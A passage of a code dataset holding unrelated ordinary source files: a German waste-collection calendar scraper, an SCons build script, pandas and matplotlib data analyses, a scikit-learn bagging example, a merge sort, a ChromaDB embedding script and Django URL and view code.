m\n","repo_name":"Silianglei/matrixX","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74146095468","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom waste_collection_schedule import Collection # type: ignore[attr-defined]\nfrom waste_collection_schedule.service.ICS import ICS\n\nTITLE = \"Abfallwirtschaftsbetrieb Esslingen\"\nDESCRIPTION = \"Source for AWB Esslingen, Germany\"\nURL = \"https://www.awb-es.de\"\n\nTEST_CASES = {\n \"Aichwald\": {\"city\": \"Aichwald\", \"street\": \"Alte Dorfstrasse\"},\n \"Kohlberg\": {\"city\": \"Kohlberg\", \"street\": \"alle Straßen\"},\n}\n\nHEADERS = {\"user-agent\": \"Mozilla/5.0 (xxxx Windows NT 10.0; Win64; x64)\"}\n\n\nclass Source:\n def __init__(self, city, street=None):\n self._city = city\n self._street = street\n self._ics = ICS()\n\n def fetch(self):\n session = requests.Session()\n\n params = {\n \"city\": self._city,\n \"street\": self._street,\n \"direct\": \"true\",\n }\n r = session.get(\n \"https://www.awb-es.de/abfuhr/abfuhrtermine/__Abfuhrtermine.html\",\n params=params,\n )\n r.raise_for_status()\n\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n downloads = soup.find_all(\"a\", href=True)\n ics_urls = list()\n for download in downloads:\n href = download.get(\"href\")\n if \"t=ics\" in href and href not in ics_urls: # the website lists the same url multiple times, we only want it once\n ics_urls.append(href)\n\n if not ics_urls:\n raise Exception(\"ics url not found\")\n\n entries = []\n for ics_url in ics_urls:\n # get ics file\n r = session.get(ics_url, headers=HEADERS)\n r.raise_for_status()\n\n # parse ics file\n dates = self._ics.convert(r.text)\n\n for d in dates:\n entries.append(Collection(d[0], d[1]))\n \n return 
entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/awb_es_de.py","file_name":"awb_es_de.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"26895941771","text":"# -*- python -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport os.path\n\nImport('env testruns')\n\ndist_headers = [\n 'hammer.h',\n 'allocator.h',\n 'compiler_specifics.h',\n 'glue.h',\n 'internal.h',\n 'platform.h'\n]\n\nparsers_headers = [\n 'parsers/parser_internal.h'\n]\n\nbackends_headers = [\n 'backends/regex.h',\n 'backends/contextfree.h'\n]\n\nparsers = ['parsers/%s.c'%s for s in\n ['action',\n 'and',\n 'attr_bool',\n 'bind',\n 'bits',\n 'butnot',\n 'ch',\n 'charset',\n 'choice',\n 'difference',\n 'end',\n 'endianness',\n 'epsilon',\n 'ignore',\n 'ignoreseq',\n 'indirect',\n 'int_range',\n 'many',\n 'not',\n 'nothing',\n 'optional',\n 'permutation',\n 'sequence',\n 'token',\n 'unimplemented',\n 'whitespace',\n 'xor',\n 'value',\n 'seek']]\n\nbackends = ['backends/%s.c' % s for s in\n ['packrat', 'llk', 'regex', 'glr', 'lalr', 'lr', 'lr0']]\n\nmisc_hammer_parts = [\n 'allocator.c',\n 'benchmark.c',\n 'bitreader.c',\n 'bitwriter.c',\n 'cfgrammar.c',\n 'datastructures.c',\n 'desugar.c',\n 'glue.c',\n 'hammer.c',\n 'pprint.c',\n 'registry.c',\n 'system_allocator.c',\n 'sloballoc.c']\n\nif env['PLATFORM'] == 'win32':\n misc_hammer_parts += [\n 'platform_win32.c',\n 'tsearch.c',\n ]\nelse:\n misc_hammer_parts += ['platform_bsdlike.c']\n\nctests = ['t_benchmark.c',\n 't_bitreader.c',\n 't_bitwriter.c',\n 't_parser.c',\n 't_grammar.c',\n 't_misc.c',\n 't_mm.c',\n 't_regression.c']\n\n\nstatic_library_name = 'hammer'\nbuild_shared_library=True\nif env['PLATFORM'] == 'win32':\n # FIXME(windows): symbols in hammer are not exported yet, a shared lib would be useless\n build_shared_library=False\n # prevent collision between .lib from dll and .lib for static lib\n static_library_name = 'hammer_s'\n\nif 'GPROF' in env and env['GPROF'] == 1:\n # Disable the shared library (it won't work with gprof) and rename the static one\n build_shared_library=False\n static_library_name = 'hammer_pg'\n\nif GetOption('llvm'):\n build_shared_library=False\n static_library_name = 'hammer_ir'\n\n# Markers for later\nlibhammer_static = None\nlibhammer_shared = None\n\nif build_shared_library:\n libhammer_shared = env.SharedLibrary('hammer', parsers + backends + misc_hammer_parts)\nlibhammer_static = env.StaticLibrary(static_library_name, parsers + backends + misc_hammer_parts)\n\nif libhammer_shared is not None:\n Default(libhammer_shared, libhammer_static)\n env.Install('$libpath', [libhammer_static, libhammer_shared])\nelse:\n Default(libhammer_static)\n env.Install('$libpath', [libhammer_static])\n\nenv.Install('$incpath', dist_headers)\nenv.Install('$parsersincpath', parsers_headers)\nenv.Install('$backendsincpath', backends_headers)\nenv.Install('$pkgconfigpath', '../../../libhammer.pc')\n\nif GetOption('with_tests'):\n testenv = env.Clone()\n testenv.ParseConfig('pkg-config --cflags --libs glib-2.0')\n if libhammer_shared is not None:\n testenv.Append(LIBS=['hammer'])\n else:\n testenv.Append(LIBS=[static_library_name])\n testenv.Prepend(LIBPATH=['.'])\n ctestexec = testenv.Program('test_suite', ctests + ['test_suite.c'], LINKFLAGS='--coverage' if testenv.GetOption('coverage') else None)\n ctest = Alias('testc', 
[ctestexec], ''.join(['env LD_LIBRARY_PATH=', os.path.dirname(ctestexec[0].path), ' ', ctestexec[0].path]))\n AlwaysBuild(ctest)\n testruns.append(ctest)\n\nif libhammer_shared is not None:\n Export('libhammer_static libhammer_shared')\nelse:\n Export('libhammer_static')\n\nfor b in env['bindings']:\n env.SConscript(['bindings/%s/SConscript' % b])\n","repo_name":"crcady/hammer","sub_path":"src/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8357978931","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.ndimage import gaussian_filter1d  # scipy.ndimage.filters is deprecated\n\nsns.set_style('darkgrid') # darkgrid, whitegrid, dark, white and ticks\nplt.rc('axes', titlesize=14) # fontsize of the axes title\nplt.rc('axes', labelsize=10) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=8) # fontsize of the tick labels\nplt.rc('ytick', labelsize=10) # fontsize of the tick labels\nplt.rc('legend', fontsize=12) # legend fontsize\nplt.rc('font', size=12) # controls default text sizes\n\nsad = pd.read_csv('~/Documents/Songaday/songaday.csv')\nmood_scores = pd.read_csv('~/Documents/Songaday/mood_scores.csv')\nmood_sorted = pd.read_csv('~/Documents/Songaday/mood_sorted.csv')\nlocation_grp = pd.read_csv('~/Documents/Songaday/location_grp.csv')\n\nsad2 = pd.DataFrame(sad['length'].str.split(':').tolist(), index= sad.index)\nsad['length'] = pd.to_numeric(sad2[0])*60+pd.to_numeric(sad2[1])\nsad['YTid'] = sad['videoID'].str.replace(r'^(.*)(/)','').str.replace(r'^(.*)(v\\=)','')\nsad_ids = ','.join(sad['YTid'])\n\nif __name__ == \"__main__\":\n # NOTE: getYTstats is not defined in this file; it is assumed to be a\n # YouTube Data API helper provided elsewhere in the project.\n results = getYTstats(sad_ids)\n\nids = list()\nviews = list()\nlikes = list()\ncomments = list()\nfor i in list(range(len(results))):\n ids.append( results[i]['id'] )\n views.append( results[i]['statistics']['viewCount'] )\n likes.append( results[i]['statistics']['likeCount'] )\n comments.append( results[i]['statistics']['commentCount'] )\n\n\n\nsad['tempo'] = pd.to_numeric(sad['tempo'],errors='coerce')\nsad['date'] = sad['date'].str.replace('.','/')\nsad2 = pd.DataFrame(sad.date.str.split('/').tolist(), index= sad.index)\nsad['date'] = pd.to_datetime(dict(year=pd.to_numeric(sad2[2]), month=pd.to_numeric(sad2[0]), day=pd.to_numeric(sad2[1]) ))\nsad['yearmonth'] = sad['date'].dt.year.map(str) + \"-\" + ('0'+sad['date'].dt.month.map(str)).str.strip().str[-2:4]\nsad['yearweek'] = sad['date'].dt.strftime('%Y-%U')\nsad['datetimemonth'] = pd.to_datetime(sad['yearmonth'], format='%Y-%m')\nsad = pd.merge(sad,mood_sorted,on='mood',how='left')\nsad = pd.merge(sad,mood_scores,on='mood',how='left')\nsad = pd.merge(sad,location_grp,on='location',how='left')\nsad['mood score'] = sad['score']\n\nsad.to_csv('~/Documents/Songaday/modified.csv')\n\n\n# Bar chart of the average of a numeric column per category\ndef bar_with_categorical_numeric_avg(sad,categorical_x,numeric_param):\n plt.figure(figsize=(16,4), tight_layout=True)\n colors = sns.color_palette('pastel')\n plottable = sad.groupby([categorical_x],as_index=False).agg({'title':'count',numeric_param:'mean'})\n plottable = plottable[plottable['title']>10]\n plt.bar(plottable[categorical_x], plottable[numeric_param], color=colors)\n plt.xlabel(categorical_x.title())\n plt.ylabel('Avg '+numeric_param)\n plt.title(numeric_param.title()+' based on '+categorical_x.title())\n plt.show()\n\n
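# (Added pointer:) the helpers defined from here on are exercised at the\n# bottom of this file, e.g. bar_with_categorical_numeric_avg(sad, 'mood', 'tempo')\n# draws the average tempo per mood for moods with more than ten songs.\n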
# Bubble graph with two categorical axes; bubble size is the occurrence count\ndef bubble_with_categorical_mood(sad,categorical_x):\n plt.figure(figsize=(70,5), tight_layout=True)\n colors = sns.color_palette('Set2')\n plottable = sad.groupby([categorical_x,'mood_sorted','mood'],as_index=False).agg({'title':'count'})\n plottable = plottable[plottable['title']>20]\n plottable = plottable.sort_values(by='mood_sorted')\n plottable['title'] *= 3\n x_axis = categorical_x.title()\n plt.scatter(x=categorical_x, y=\"mood\", s=\"title\", data=plottable, color = colors[2])\n plt.xlabel(categorical_x)\n plt.ylabel('Mood')\n plt.title(x_axis+' vs Mood')\n plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n plt.show()\n\n# Line graph where the y-axis is numeric and the x-axis is yearmonth\ndef line_overtime(sad,numeric_line):\n plt.figure(figsize=(80,7), tight_layout=True)\n colors = sns.color_palette('Set2')\n plottable = sad.groupby(['yearmonth'], as_index=False)[numeric_line].mean()\n plottable = plottable[['yearmonth',numeric_line]]\n smoothed = gaussian_filter1d(plottable[numeric_line], sigma=1.5)\n plt.plot(plottable['yearmonth'], smoothed,'ko-',color=colors[0], markersize=4)\n plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n plt.xticks(rotation=90)\n plt.show()\n\n# Line graph where the x-axis is categorical\ndef line_with_categorical_x(sad,categorical_x,numeric_line):\n plt.figure(figsize=(70,5), tight_layout=True)\n colors = sns.color_palette('Set2')\n plottable = sad.groupby([categorical_x],as_index=False).agg({'title':'count',numeric_line:'mean'})\n plottable = plottable[plottable['title']>50]\n plottable = plottable.sort_values(by=numeric_line)\n smoothed = gaussian_filter1d(plottable[numeric_line], sigma=1.5)\n plt.plot(plottable[categorical_x], smoothed,'ko-',color=colors[1], markersize=4)\n plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n if numeric_line=='score': y_axis = 'Mood score'\n else: y_axis = numeric_line\n plt.title(y_axis + ' vs ' + categorical_x)\n plt.show()\n\n\nbar_with_categorical_numeric_avg(sad,'mood','tempo')\nbar_with_categorical_numeric_avg(sad,'mood','length')\n\nline_overtime(sad,'tempo')\nline_overtime(sad,'length')\nline_overtime(sad,'mood score')\n\n\n# Mood count over time (line)\nplot_time_mood = sad.groupby(['yearmonth','mood'], as_index=False)['title'].count()\nplot_time_select = plot_time_mood[plot_time_mood['mood'].isin(['Sad','Happy','Angry','Excited'])]\n\ndef assignMood(olddf,moodname):\n newdf = olddf[olddf['mood']==moodname]\n newdf = newdf.rename(columns={'title': moodname})\n newdf = newdf.drop(columns='mood')\n return newdf\n\nplot_time_happy = assignMood(plot_time_mood,'Happy')\nplot_time_sad = assignMood(plot_time_mood,'Sad')\nplot_time_angry = assignMood(plot_time_mood,'Angry')\nplot_time_excited = assignMood(plot_time_mood,'Excited')\nnewdf = pd.merge(plot_time_happy,plot_time_sad,on='yearmonth',how='outer')\nnewdf = pd.merge(newdf,plot_time_angry,on='yearmonth',how='outer')\nnewdf = pd.merge(newdf,plot_time_excited,on='yearmonth',how='outer')\nnewdf = newdf.sort_values(by='yearmonth')\nnewdf = newdf.fillna(0)\nnewdf['HappyExcited'] = newdf['Happy']+newdf['Excited']\nnewdf['SadAngry'] = newdf['Sad']+newdf['Angry']\nHE_smoothed = gaussian_filter1d(newdf['HappyExcited'], sigma=1.5)\nSA_smoothed = gaussian_filter1d(newdf['SadAngry'], sigma=1.5)\n\nplt.figure(figsize=(80,6), tight_layout=True)\ncolors = sns.color_palette('pastel')\nline0 = plt.plot(newdf['yearmonth'], HE_smoothed,'ko-',label='Happy+Excited', color = colors[2], markersize=4)\n
line1 = plt.plot(newdf['yearmonth'], SA_smoothed,'ro-',label='Sad+Angry', color = colors[3], markersize=4)\nplt.xticks(rotation=90)\nplt.xlabel('Month')\nplt.ylabel('# of times')\nplt.title('Mood per month')\nplt.legend(loc=\"upper left\")\nplt.show()\n\n# Bubble graph for all moods\nplt.figure(figsize=(80,6), tight_layout=True)\ncolors = sns.color_palette('Set2')\nplot_time_score = sad.groupby(['yearmonth','mood'], as_index=False)['title'].count()\nplot_time_score['title'] *= 30\nplt.scatter(x=\"yearmonth\", y=\"mood\", s=\"title\", data=plot_time_score, color = colors[0])\nplt.rc('xtick', labelsize=7) # fontsize of the tick labels\nplt.xticks(rotation=90)\nplt.show()\n\n# Moods over categories\nbubble_with_categorical_mood(sad,'main instrument')\nbubble_with_categorical_mood(sad,'location')\n\n# Bubble graph for selected moods /// NOT SAVED\nplt.figure(figsize=(80,5), tight_layout=True)\ncolors = sns.color_palette('pastel')\nplot_time_moodcount = sad.groupby(['yearmonth','mood'], as_index=False)['title'].count()\nplot_time_moodcount = plot_time_moodcount[plot_time_moodcount['mood'].isin(['Happy','Excited','Angry','Sad'])]\nplot_time_moodcount['title'] *= 40\nplt.scatter(x=\"yearmonth\", y=\"mood\", s=\"title\", data=plot_time_moodcount)\nplt.rc('xtick', labelsize=7) # fontsize of the tick labels\nplt.xticks(rotation=90)\nplt.show()\n\n# Mood score over categories\nline_with_categorical_x(sad,'location','score')\nline_with_categorical_x(sad,'location_grp','score')\nline_with_categorical_x(sad,'main instrument','score')\nline_with_categorical_x(sad,'main style','score')\nline_with_categorical_x(sad,'topic','score')\nline_with_categorical_x(sad,'inKey','score')\nline_with_categorical_x(sad,'topic','length')\nline_with_categorical_x(sad,'main instrument','length')\n\n\n\nnumeric_line = 'mood score'\nplottable = sad.groupby(['yearmonth'], as_index=False)[numeric_line].mean()\nplottable = plottable[['yearmonth',numeric_line]]\nsmoothed1 = gaussian_filter1d(plottable[numeric_line], sigma=1.5)\n\n\nplottable = sad.groupby(['yearmonth'],as_index=False).agg({'title':'count','mood score':'mean','tempo':'mean'})\nsmoothed1 = gaussian_filter1d(plottable['mood score'], sigma=1.5)\nsmoothed2 = gaussian_filter1d(plottable['tempo'], sigma=1.5)\n\ncolors = sns.color_palette('Set2')\nfig, ax = plt.subplots(figsize=(12,5))\nax2 = ax.twinx()\nax.plot(plottable['yearmonth'], smoothed1,'ko-',color=colors[0], markersize=4)\nax2.plot(plottable['yearmonth'], smoothed2,'ko-',color=colors[1], markersize=4)\nplt.show()\n\n\n\n# Leftover scratch lines; they reference names only defined inside the plotting\n# helpers, so they are commented out to keep the module importable.\n# plt.xlabel(categorical_x)\n# plt.ylabel('Mood')\n# plt.title(x_axis+' vs Mood')\n# plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n","repo_name":"chainleft/Songaday","sub_path":"songaday.py","file_name":"songaday.py","file_ext":"py","file_size_in_byte":8987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25971703339","text":"from sklearn.ensemble import BaggingClassifier\r\n# (Imports below were missing from the original snippet and are assumed\r\n# to match the estimators used further down.)\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn import metrics\r\n\r\n# train_X, train_Y, test_X, test_Y, X and Y are assumed to be prepared elsewhere.\r\n# Bagged KNN\r\nmodel = BaggingClassifier(base_estimator=KNeighborsClassifier(\r\n n_neighbors=3), random_state=0, n_estimators=700)\r\nmodel.fit(train_X, train_Y)\r\nprediction = model.predict(test_X)\r\nprint('The accuracy for bagged KNN is:',\r\n metrics.accuracy_score(prediction, test_Y))\r\nresult = cross_val_score(model, X, Y, cv=10, scoring='accuracy')\r\nprint('The cross validated score for bagged KNN is:', result.mean())\r\n\r\n# Bagged DecisionTree\r\nmodel = BaggingClassifier(\r\n base_estimator=DecisionTreeClassifier(), random_state=0, n_estimators=100)\r\nmodel.fit(train_X, train_Y)\r\n
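# (Added aside, not in the original:) with bootstrap sampling (the default),\r\n# BaggingClassifier can also score itself on out-of-bag samples, avoiding a\r\n# separate validation split:\r\n#   BaggingClassifier(base_estimator=DecisionTreeClassifier(), n_estimators=100,\r\n#                     oob_score=True, random_state=0).fit(train_X, train_Y).oob_score_\r\n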
prediction = model.predict(test_X)\r\nprint('The accuracy for bagged Decision Tree is:',\r\n metrics.accuracy_score(prediction, test_Y))\r\nresult = cross_val_score(model, X, Y, cv=10, scoring='accuracy')\r\nprint('The cross validated score for bagged Decision Tree is:', result.mean())\r\n","repo_name":"kmsk99/data_science_toolbar","sub_path":"modeling/machine_learning/ensembling/bagging.py","file_name":"bagging.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13550036539","text":"'''\r\n11b. Python and DataScience \r\n a) Load the ‘Student Performance’ dataset into one of the data structures (NumPy or Pandas).\r\n\tb) Display header rows and a description of the loaded dataset.\r\n\tc) Remove unnecessary features (e.g. drop unwanted columns) from the dataset, such as ‘lunch’ and ‘test preparation course’.\r\n\td) Manipulate data by replacing empty column values in ‘parental level of education’ with a default value.\r\n\te) Perform the following visualization on the loaded dataset: tally of the number of male & female students who took up the ‘test preparation course’ and those who did not. \r\n'''\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndata=pd.read_excel(\"StudentsPerformance.xlsx\")\r\n\r\nprint(data.head())\r\nprint(data.describe())\r\ndata.info(verbose=True)  # info() prints its report itself and returns None\r\naxis=sns.countplot(x='gender',hue=\"test preparation course\",data=data)\r\nplt.show()\r\ndata.drop([\"lunch\",\"test preparation course\"],inplace=True,axis=1)\r\nprint(list(data.columns))\r\ndata[\"parental level of education\"]=data[\"parental level of education\"].fillna('NONE')\r\nprint(data[\"parental level of education\"])\r\n","repo_name":"KritikaChoudhary/Scripting-Languages-Lab","sub_path":"SEE/11b.py","file_name":"11b.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71630085546","text":"from math import ceil\n\ndef merge(array, start, mid, end):\n\tif not (end < len(array)):\n\t\treturn\n\taux = array.copy()\n\tj, left, right = start, start, mid\n\t\n\t# Merge the two halves until one of them is exhausted\n\twhile left < mid and right <= end:\n\t\tif aux[left] > aux[right]:\n\t\t\tarray[j] = aux[right]\n\t\t\tright += 1\n\t\telif aux[left] <= aux[right]:\n\t\t\tarray[j] = aux[left]\n\t\t\tleft += 1\n\t\tj += 1\n\t# Copy the rest of the left half if the right one was exhausted first\n\twhile left < mid:\n\t\tarray[j] = aux[left]\n\t\tleft = left + 1\n\t\tj += 1\n\t# Copy the rest of the right half if the left one was exhausted first\n\twhile right <= end:\n\t\tarray[j] = aux[right]\n\t\tright += 1\n\t\tj += 1\n\ndef merge_sort(array):\n\tstart = 0\n\tend = len(array) - 1\n\n\tdef _merge_sort(array, start, end):\n\t\tmid = ceil((end + start)/2)\n\t\tif (start < end):\n\t\t\t_merge_sort(array, start, mid - 1)\n\t\t\t_merge_sort(array, mid, end)\n\t\t\tmerge(array, start, mid, end)\n\n\t_merge_sort(array, start, end)\n\ndef merge_sort_i(array):\n\tblock = 1\n\tarraySize = len(array)\n\twhile block < arraySize:\n\t\tmid = block\n\t\tstart = 0\n\t\tend = mid + block - 1\n\t\twhile mid < arraySize:\n\t\t\tmerge(array, start, mid, min(end, arraySize - 1))\n\t\t\tstart = end + 1\n\t\t\tmid = end + block + 1\n\t\t\tend = mid + block - 1\n\t\tblock *= 2\n\n
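# (Added note, not in the original:) merge_sort_i is the bottom-up variant:\n# block sizes double each pass (1, 2, 4, ...) and adjacent runs are merged,\n# e.g. merge_sort_i([3, 1, 2]) merges [3],[1] then [1, 3],[2] -> [1, 2, 3].\n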
def is_sorted(array):\n\t'''\n\tReturn True if the given array is sorted in ascending order\n\t:type array: list\n\t:rtype: boolean\n\t'''\n\tminElement = float(\"-inf\")\n\tfor element in array:\n\t\tif minElement > element:\n\t\t\treturn False\n\t\tminElement = element\n\treturn True\n\nif __name__ == '__main__':\n\tfrom random import sample\n\n\tfor s in range(1,11):\n\t\tprint('Merge Sort random test -', s)\n\t\tarr = sample(range(100), 10)\n\t\tprint(arr, \" is sorted? \", is_sorted(arr))\n\t\tmerge_sort_i(arr)\n\t\tprint(arr, \" is sorted? \", is_sorted(arr))\n\t\tprint('\\n')","repo_name":"gedhean/data-structures","sub_path":"algorithms/sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37058807336","text":"#!/usr/bin/env python3\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\nstudent_grades = np.random.normal(68, 15, 50)\n\n# Plot data\nbins = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\nplt.hist(student_grades, bins=bins, edgecolor='black')\n\n# Create labels\nplt.xlabel('Grades')\nplt.ylabel('Number of Students')\nplt.title('Project A')\n\n# Format\nplt.xlim(0, 100)\nplt.xticks(ticks=bins)\nplt.ylim(0, 30)\n\nplt.show()\n","repo_name":"kyle-gross/holbertonschool-machine_learning","sub_path":"math/0x01-plotting/4-frequency.py","file_name":"4-frequency.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22588337008","text":"# This file embeds the answers and stores them in a persistent ChromaDB\n# collection, which acts as the vector database (one could use Pinecone etc. instead).\n\nimport read_data as rd\nimport chromadb\nfrom chromadb.utils import embedding_functions\n\nquestions, answers, q_ids = rd.get_all_questions_answers()\n\n# It is important to have a persistent client for future retrievals\nchroma_client = chromadb.PersistentClient('q_a')\n\nsentence_transformer_ef = embedding_functions.SentenceTransformerEmbeddingFunction(model_name=\"all-MiniLM-L6-v2\")\n\ncollection = chroma_client.create_collection(name=\"embed_data_new\")\nq_ids = list(map(str, q_ids))\n\ncollection.add(\n documents = answers,\n embeddings = sentence_transformer_ef(answers),\n ids = q_ids\n)\n","repo_name":"ju7stritesh/PromptSystemArchitecture","sub_path":"embed_answers_chromadb.py","file_name":"embed_answers_chromadb.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24253242632","text":"from django.conf.urls import url, include\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView\nfrom django.views.generic import DeleteView\nfrom django.views.generic import DetailView\nfrom django.views.generic import UpdateView\n\nfrom django.contrib.auth import views\nfrom projects.filters import ThesisInfoFilter, MeetingInfoFilter, NoticeFilter\nfrom projects.form import ThesisInfoAddForm, MeetingInfoAddForm, NoticeAddForm\nfrom .models import ThesisInfo, MeetingInfo,Notice\nfrom .views import *\n\napp_name = 'projects'\n\nurlpatterns = [\n url(r'^login/$', login,\n {'template_name': 'projects/myuser/login.html'},name='userLogin'),\n url(r'^logout/$', views.logout, {'template_name': 'projects/myuser/login.html'}, name='logout'),\n\n url(r'^index$', indexView, name='index'),\n\n 
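# (Added note:) every name below is reversed via reverse_lazy('projects:<name>'),\n # matching the app_name declared above.\n 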
#thesisInfo\n url(r'^thesisInfoList$',\n ThesisInfoListView.as_view(model=ThesisInfo, filterset_class=ThesisInfoFilter, template_name='projects/thesisInfo/list.html',\n paginate_by=7),name='thesisInfoList'),\n url(r'^thesisInfoAdd$',add, name='thesisInfoAdd'),\n url(r'^thesisInfo/(?P<pk>[0-9]+)/$', DetailView.as_view(model=ThesisInfo, template_name='projects/thesisInfo/detail.html'),\n name='thesisInfoDetail'),\n # NOTE: the three routes below share one regex, so in practice only the\n # first ('thesisInfoUpdate') can ever match.\n url(r'^(?P<pk>[0-9]+)/updatethesisInfo$', UpdateView.as_view(model=ThesisInfo, form_class=ThesisInfoAddForm,\n template_name='projects/thesisInfo/update.html',\n success_url=reverse_lazy('projects:thesisInfoList')),\n name='thesisInfoUpdate'),\n url(r'^(?P<pk>[0-9]+)/updatethesisInfo$', UpdateView.as_view(model=ThesisInfo, form_class=ThesisInfoAddForm,\n template_name='projects/thesisInfo/update.html',\n success_url=reverse_lazy('projects:thesisInfoList')),\n name='thesisInfoReview'),\n url(r'^(?P<pk>[0-9]+)/updatethesisInfo$', UpdateView.as_view(model=ThesisInfo, form_class=ThesisInfoAddForm,\n template_name='projects/thesisInfo/update.html',\n success_url=reverse_lazy('projects:thesisInfoList')),\n name='thesisInfoCheck'),\n url(r'^(?P<pk>[0-9]+)/deletethesisInfo$',\n DeleteView.as_view(model=ThesisInfo, success_url=reverse_lazy('projects:thesisInfoList')), name='thesisInfoDelete'),\n #meetingInfo\n url(r'^meetingInfoList$',\n MeetingInfoListView.as_view(model=MeetingInfo, filterset_class=MeetingInfoFilter,\n template_name='projects/meetingInfo/list.html',\n paginate_by=7), name='meetingInfoList'),\n url(r'^meetingInfoAdd$',\n CreateView.as_view(model=MeetingInfo, template_name='projects/meetingInfo/add.html',\n form_class=MeetingInfoAddForm,\n success_url=reverse_lazy('projects:meetingInfoList')), name='meetingInfoAdd'),\n url(r'^meetingInfo/(?P<pk>[0-9]+)/$',\n DetailView.as_view(model=MeetingInfo, template_name='projects/meetingInfo/detail.html'),\n name='meetingInfoDetail'),\n url(r'^(?P<pk>[0-9]+)/updatemeetingInfo$', UpdateView.as_view(model=MeetingInfo, form_class=MeetingInfoAddForm,\n template_name='projects/meetingInfo/update.html',\n success_url=reverse_lazy('projects:meetingInfoList')),\n name='meetingInfoUpdate'),\n url(r'^(?P<pk>[0-9]+)/deletemeetingInfo$',\n DeleteView.as_view(model=MeetingInfo, success_url=reverse_lazy('projects:meetingInfoList')),\n name='meetingInfoDelete'),\n #notice\n url(r'^noticeList$',\n NoticeListView.as_view(model=Notice, filterset_class= NoticeFilter,\n template_name='projects/notice/list.html',\n paginate_by=7), name='noticeList'),\n url(r'^noticeAdd$',\n CreateView.as_view(model=Notice, template_name='projects/notice/add.html',\n form_class=NoticeAddForm,\n success_url=reverse_lazy('projects:noticeList')), name='noticeAdd'),\n url(r'^notice/(?P<pk>[0-9]+)/$',\n DetailView.as_view(model=Notice, template_name='projects/notice/detail.html'),\n name='noticeDetail'),\n url(r'^(?P<pk>[0-9]+)/updatenotice$', UpdateView.as_view(model=Notice, form_class=NoticeAddForm,\n template_name='projects/notice/update.html',\n success_url=reverse_lazy('projects:noticeList')),\n name='noticeUpdate'),\n url(r'^(?P<pk>[0-9]+)/deletenotice$',\n DeleteView.as_view(model=Notice, success_url=reverse_lazy('projects:noticeList')),\n name='noticeDelete'),\n]\n","repo_name":"iakisme/academic","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19659795877","text":"\nfrom django.shortcuts import render,redirect\nfrom .forms import profileform, UsercreateForm, userupdateform\nfrom django.contrib import messages\nfrom django.contrib.auth import login,authenticate\nfrom django.views.generic import CreateView\n
from django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\n# Create your views here.\n\n\ndef profilepage(request):\n if request.method==\"POST\":\n user_form = userupdateform(request.POST, instance=request.user)\n profile_form = profileform(request.POST, request.FILES, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, 'Profile created successfully!!')\n return render(request, 'home.html')\n # only flag an error when a submitted form failed validation\n messages.error(request, 'There seems to be an error in the form')\n else:\n user_form = userupdateform(instance=request.user)\n profile_form = profileform(instance=request.user.profile)\n\n return render(request, 'profile.html', {'form': user_form, 'p_form': profile_form})\n\ndef accountsetting(request):\n if request.method==\"POST\":\n form = userupdateform(request.POST, instance=request.user)\n profile_form = profileform(request.POST, request.FILES)\n if form.is_valid() and profile_form.is_valid():\n form.save()\n profile_form.save()\n return redirect('destination')\n else:\n form = userupdateform()\n profile_form = profileform()\n return render(request, 'preferencesinfo.html', {'f': form, 'p': profile_form})\n\n\ndef registerpage(request):\n if request.method==\"POST\":\n user_form = UsercreateForm(request.POST)\n if user_form.is_valid():\n user_form.save()\n u_name = user_form.cleaned_data.get('username')\n messages.success(request, f'Account created successfully for {u_name}!!')\n return redirect('login')\n else:\n user_form = UsercreateForm()\n return render(request, 'registeruser.html', {'form': user_form})\n","repo_name":"DipinMainali/hamroproject","sub_path":"registration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33022989583","text":"print(\"Welcome to the 